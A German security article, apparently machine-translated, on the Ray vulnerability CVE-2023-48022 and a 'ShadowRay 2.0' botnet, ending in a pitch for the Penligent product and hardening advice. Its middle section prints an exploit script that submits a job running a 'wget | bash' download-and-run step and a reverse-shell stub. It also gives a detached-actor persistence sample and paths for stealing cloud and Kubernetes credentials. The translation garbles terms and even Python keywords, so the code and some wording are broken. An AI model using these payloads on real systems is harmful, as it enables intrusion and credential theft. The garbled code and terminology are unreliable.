Wir schreiben das Jahr 2026. Die KI-Branche hat sich von experimentellen Chatbots zu autonomen Agenten entwickelt, die kritische Infrastrukturen steuern. Doch in den Serverfarmen und Kubernetes-Clustern der fortschrittlichsten KI-Unternehmen der Welt spukt ein Geist aus der Vergangenheit: CVE-2023-48022.

Diese kritische Sicherheitslücke (CVSS 9.8) in der Software für das Internet wurde ursprünglich Ende 2023 bekannt gegeben. Strahlenrahmen-der von OpenAI, Uber und Amazon verwendete Standard für verteilte Datenverarbeitung- sollte eigentlich ein gelöstes Problem sein. Doch die Ende 2025 einsetzende Explosion des SchattenRay 2.0 Botnet hat das Gegenteil bewiesen. Zehntausende von GPU-Clustern wurden stillschweigend in Zombie-Netzwerke eingezogen, nicht nur für Kryptomining, sondern auch für ausgeklügelte Datenexfiltration und verteilte Denial-of-Service-Angriffe (DDoS).

Für die Elite der KI-Sicherheitsingenieure ist CVE-2023-48022 nicht nur ein Fehler, sondern eine Fallstudie in "Insecure by Design". Sie stellt eine Kollision zwischen der offenen Forschungskultur der KI-Entwicklung und der feindseligen Realität des modernen Internets dar. Dieser Artikel bietet eine forensische Analyse der Schwachstelle, analysiert die weiterentwickelte Technik von ShadowRay 2.0 und zeigt auf, warum herkömmliche Scans das KI-Rechensubstrat nicht schützen können.

Die Architektur eines "Feature-as-a-Vulnerability"

Um zu verstehen, warum CVE-2023-48022 sich weigert zu sterben, muss man die Philosophie von Ray verstehen. Ray wurde für Geschwindigkeit und Benutzerfreundlichkeit in vertrauenswürdigen Intranets entwickelt.

Der Makel:

In Versionen vor der umfassenden Härtung (und in falsch konfigurierten modernen Implementierungen) binden sich das Ray Dashboard und die Jobs-API standardmäßig ohne Authentifizierungsmechanismen an 0.0.0.0:8265.

Anyscale, die Entwickler von Ray, bestritten zunächst die CVE-Zuweisung mit dem Argument, dass Ray für den Einsatz innerhalb einer strikten Netzwerkgrenze gedacht sei. Dieses Vertrauen in das "harte äußere Schalen"-Verteidigungsmodell brach zusammen, als die Entwickler begannen, die Ray-Dashboards zur Fernüberwachung dem Internet auszusetzen, oder als Angreifer Server-Side Request Forgery (SSRF) einsetzten, um intern zu schwenken.

Dekonstruktion der Angriffsfläche

Die Schwachstelle ermöglicht einem Angreifer die vollständige Kontrolle über den Ray-Cluster über eine einfache HTTP-API. Es gibt keine Speicherbeschädigung, keine Race Condition und es ist kein komplexes Heap-Feng-Shui erforderlich.

Die Angriffs-Primitiven:

1. Der Einstiegspunkt: Die Jobs-API (/api/jobs/).
2. Der Mechanismus: Die API ermöglicht die Übermittlung von beliebigem Python-Code oder Shell-Befehlen, die auf den Arbeitsknoten des Clusters ausgeführt werden sollen.
3. Das Privileg: Ray-Prozesse laufen oft als Wurzel innerhalb von Docker-Containern oder mit hochprivilegierten IAM-Rollen, um auf S3-Buckets mit Datensätzen zuzugreifen.

Technische Wiederholung: Die ShadowRay-Kill-Kette

Rekonstruieren wir die von den ShadowRay 2.0-Akteuren verwendete Exploit-Logik. Dies geht über einfache locken. Befehle, um zu zeigen, wie sie die anhaltende Kontrolle orchestrieren.

Phase 1: Erkundung und Fingerabdrucknahme

Angreifer scannen speziell nach TCP-Port 8265. Sie erstellen einen Fingerabdruck des Dienstes durch Abfrage /api/version oder nach dem unverwechselbaren Ray Dashboard HTML-Titel suchen.

Phase 2: Weaponization (Python Job Submission)

Der Angreifer konstruiert ein Python-Skript, das als "Job Submitter" fungiert. Dieses Skript interagiert mit der API des Ziels, um eine bösartige Aufgabe auszulösen.

Python

Anfragen importieren json import sys importieren

Ziel: Ein exponierter Strahlencluster, gefunden über Shodan oder SSRF

TARGET_IP = "http://target-cluster.ai:8265“

def exploit_cluster(target): url = f"{target}/api/jobs/"

# Die Nutzlast: Ein mehrstufiges Bash-Skript
# 1. Dauerhaftigkeit: Erstellen eines versteckten Cron-Jobs oder systemd-Dienstes
# 2. Umgehung: Konkurrierende Miner töten
# 3. Verbindung: Reverse Shell zu C2
Einstiegspunkt_cmd = (
    "wget -qO-  | bash && "
    "export OMP_NUM_THREADS=1 && "
    "python3 -c 'import socket,os,pty;s=socket.socket();...'"
)

payload = {
    "Einsprungpunkt": Einsprungpunkt_cmd,
    "submission_id": "optimierung_aufgabe_v4", # Social Engineering: Wie ein legaler Auftrag aussehen
    "runtime_env": {
        "working_dir": "/tmp",
        "pip": ["requests", "boto3"] # Vorinstallation von Tools für die Exfiltration
    },
    "metadata": {
        "user": "root",
        "Beschreibung": "System Health Check"
    }
}

try:
    print(f"[*] Sending payload to {target}...")
    resp = requests.post(url, json=payload, timeout=10)
    
    if resp.status_code == 200:
        job_id = resp.json().get('job_id')
        print(f"[+] Exploitation erfolgreich, Job-ID: {job_id}")
        print(f"[+] Der Cluster ist jetzt unter Ihrer Kontrolle.")
    sonst:
        print(f"[-] Fehlgeschlagen: {resp.status_code} - {resp.text}")
        
except Exception as e:
    print(f"[!] Fehler: {e}")

wenn Name == “Haupt"exploit_cluster(TARGET_IP)`

Phase 3: Seitwärtsbewegung durch Identitätsdiebstahl

Sobald der Code auf dem Arbeitsknoten ausgeführt wird, nutzt das Skript die Instanz-Metadaten-Dienst (IMDS) um Cloud-Anmeldedaten zu stehlen.

• AWS: Abfrage http://169.254.169.254/latest/meta-data/iam/security-credentials/ um die Schlüssel der EC2-Rolle zu stehlen.
• Kubernetes: Lesen Sie /var/run/secrets/kubernetes.io/serviceaccount/token.

Da KI-Trainingsjobs Zugang zu riesigen Datensätzen erfordern, haben diese Qualifikationen oft S3FullAccess oder gleichwertige Berechtigungen, so dass der Angreifer proprietäre Modelle (im Wert von Millionen) exfiltrieren oder Trainingsdaten vergiften kann.

ShadowRay 2.0: Entwicklung der Persistenz

Die Ende 2025 beobachtete Variante "2.0" führte einen neuen Persistenzmechanismus ein: Freischaffende Schauspieler.

In Ray ist ein "Actor" ein zustandsabhängiger Arbeitsprozess. Angreifer setzen bösartige Actoren ein, die so konzipiert sind, dass sie sich vom Job-Lebenszyklus abkoppeln. Selbst wenn das Sicherheitsteam den auf dem Dashboard angezeigten "Job" beendet, bleibt der Actor-Prozess im Hintergrund aktiv, verbraucht Ressourcen und hält die C2-Verbindung aufrecht.

Python

# Conceptual Malicious Actor @ray.remote class ShadowActor: def init(self): self.c2_connection = setup_c2()

def keep_alive(self):
    while True:
        # Mining oder Exfiltrationslogik
        process_data()
        time.sleep(1)

Einsatz als losgelöster Akteur - überlebt die Kündigung des Arbeitsplatzes

actor = ShadowActor.options(name="system_optimizer", lifetime="detached").remote()`

Das "Schatten-KI"-Problem und Erkennungsmängel

Warum werden Unternehmen mit teuren Firewalls immer noch von CVE-2023-48022 betroffen? Die Antwort liegt in Schatten-KI.

Datenwissenschaftler und ML-Ingenieure umgehen oft die IT-Kontrollen, um temporäre Cluster für Experimente einzurichten. Sie verwenden Terraform-Skripte oder von GitHub kopierte Helm-Diagramme, die standardmäßig das Dashboard offenlegen, um das Debugging zu erleichtern. Diese "Schattencluster" sind für das zentrale IT-Inventar und herkömmliche Schwachstellen-Scanner unsichtbar (diese scannen 192.168.1.0/24 aber die flüchtigen VPCs, die von Ingenieuren erstellt werden, vermissen).

Außerdem prüfen herkömmliche Scanner auf Software-Versionen. Wenn ein Ingenieur einen Ray-Cluster mit einem älteren, stabilen Docker-Image startet (z. B., rayproject/ray:2.8.0), um ein Papier zu reproduzieren, ist es sofort angreifbar.

KI-gesteuerte Verteidigung: Der Penligent-Ansatz

Die Abwehr von ShadowRay erfordert mehr als einen statischen Scan; sie erfordert dynamische Entdeckung von Vermögenswerten und Verhaltensanalyse.

Dies ist der Ort, an dem Penligent.ai ändert die Verteidigungshaltung für die KI-Infrastruktur.

1. Kartierung der Schattenwirtschaft

Die Agenten von Penligent lassen sich in Cloud-APIs (AWS, Azure, GCP) und Kubernetes-Cluster integrieren, um eine kontinuierliche Bestandserkennung durchzuführen. Es identifiziert Recheninstanzen, die ein "Ray-ähnliches" Verhalten zeigen (offene Ports 8265, 10001, 6379), selbst wenn sie nicht als Produktionsanlagen gekennzeichnet sind. Dies beleuchtet die Oberfläche der "Schatten-KI".

2. Aktive, sichere Verifizierung

Anstatt sich auf Banner-Grabbing zu verlassen (das gefälscht werden kann), führt Penligent Sichere aktive Verifizierung. Er versucht, mit der Jobs-API zu interagieren, indem er eine harmlose Nutzlast verwendet, wie z. B. das Übermitteln eines Auftrags, der einfach nur berechnet 1 + 1 oder gibt eine zufällige Zeichenfolge wieder.

• Bei Erfolg: Es bestätigt das RCE-Risiko ohne Fehlalarme und alarmiert das SOC sofort.
• Sicherheit: Im Gegensatz zu einem Wurm verändert die Penligent-Sonde nicht den Systemstatus, installiert keine Persistenz und exfiltriert keine Daten.

3. Erkennung von Anomalien in Compute Signatures

Penligent erstellt eine Basislinie für legitime Trainingsauslastungen. ShadowRay-Infektionen haben einen eindeutigen Fingerabdruck:

• Netzwerk: Unerwartete ausgehende Verbindungen zu Mining-Pools oder unbekannten IPs (C2).
• Berechnen: CPU/GPU-Auslastungsspitzen, die nicht mit geplanten Trainingsaufträgen korrelieren.
• Prozess: Ablaichen von ungewöhnlichen Muscheln (/bin/bash, locken., wget) aus dem Ray-Arbeitsprozessbaum.

Verteidigungsstrategie für 2026: Härtung des Rechensubstrats

Um Ihre Infrastruktur gegen CVE-2023-48022 und seine Nachfolger zu immunisieren, implementieren Sie diese Hardcore-Kontrollen:

1. Zero Trust Networking: Stellen Sie das Ray Dashboard niemals dem öffentlichen Internet zur Verfügung. Der Zugriff sollte über einen sicheren Bastion Host, VPN oder einen identitätsbewussten Proxy (IAP) wie Cloudflare Access oder AWS Verified Access erfolgen.
2. Authentifizierung erzwingen (gegenseitiges TLS): Ray unterstützt jetzt zwar die Basisauthentifizierung, aber der Goldstandard ist mTLS. Konfigurieren Sie Ray so, dass Client-Zertifikate für die gesamte Kommunikation innerhalb des Clusters und zwischen Client und Server erforderlich sind.
3. Namensraum-Isolierung: Ausführen von Ray-Clustern in dedizierten Kubernetes-Namensräumen mit strikter NetworkPolicies. Verweigern Sie den gesamten ausgehenden Datenverkehr mit Ausnahme von S3-Buckets und Modellregistern (Hugging Face), die auf der Whitelist stehen. Blockieren Sie den Zugriff auf das IMDS (169.254.169.254).
4. Unveränderliche Infrastruktur: Verwenden Sie schreibgeschützte Root-Dateisysteme für Ray-Worker-Container, um Angreifer daran zu hindern, Tools herunterzuladen oder Persistenz auf der Festplatte herzustellen.

Schlussfolgerung

CVE-2023-48022 ist nicht nur eine Schwachstelle, sondern ein Symptom dafür, dass die Industrie die KI auf Kosten der Sicherheitsarchitektur überstürzt eingeführt hat. Da wir uns zunehmend auf verteilte Datenverarbeitung verlassen, ist die "Netzwerkgrenze" kein ausreichender Schutz mehr.

Die ShadowRay 2.0-Kampagne beweist, dass Angreifer aktiv auf der Suche nach diesen offenen Türen sind. Sicherheitsingenieure müssen sich eine "Assume Breach"-Mentalität zu eigen machen und KI-gesteuerte Tools wie Penligent nutzen, um ihre Rechenressourcen kontinuierlich zu entdecken, zu testen und zu härten, bevor sie zum nächsten Knoten in einem Zombie-Botnet werden.

Zuverlässige Referenzen

• Oligo Sicherheit: ShadowRay - Die erste KI-Workload-Angriffskampagne
• Anyscale Sicherheitshinweis: CVE-2023-48022
• NIST NVD-Einzelheit: CVE-2023-48022
• Referat 42: Cloud-Bedrohungsbericht - KI-Infrastruktur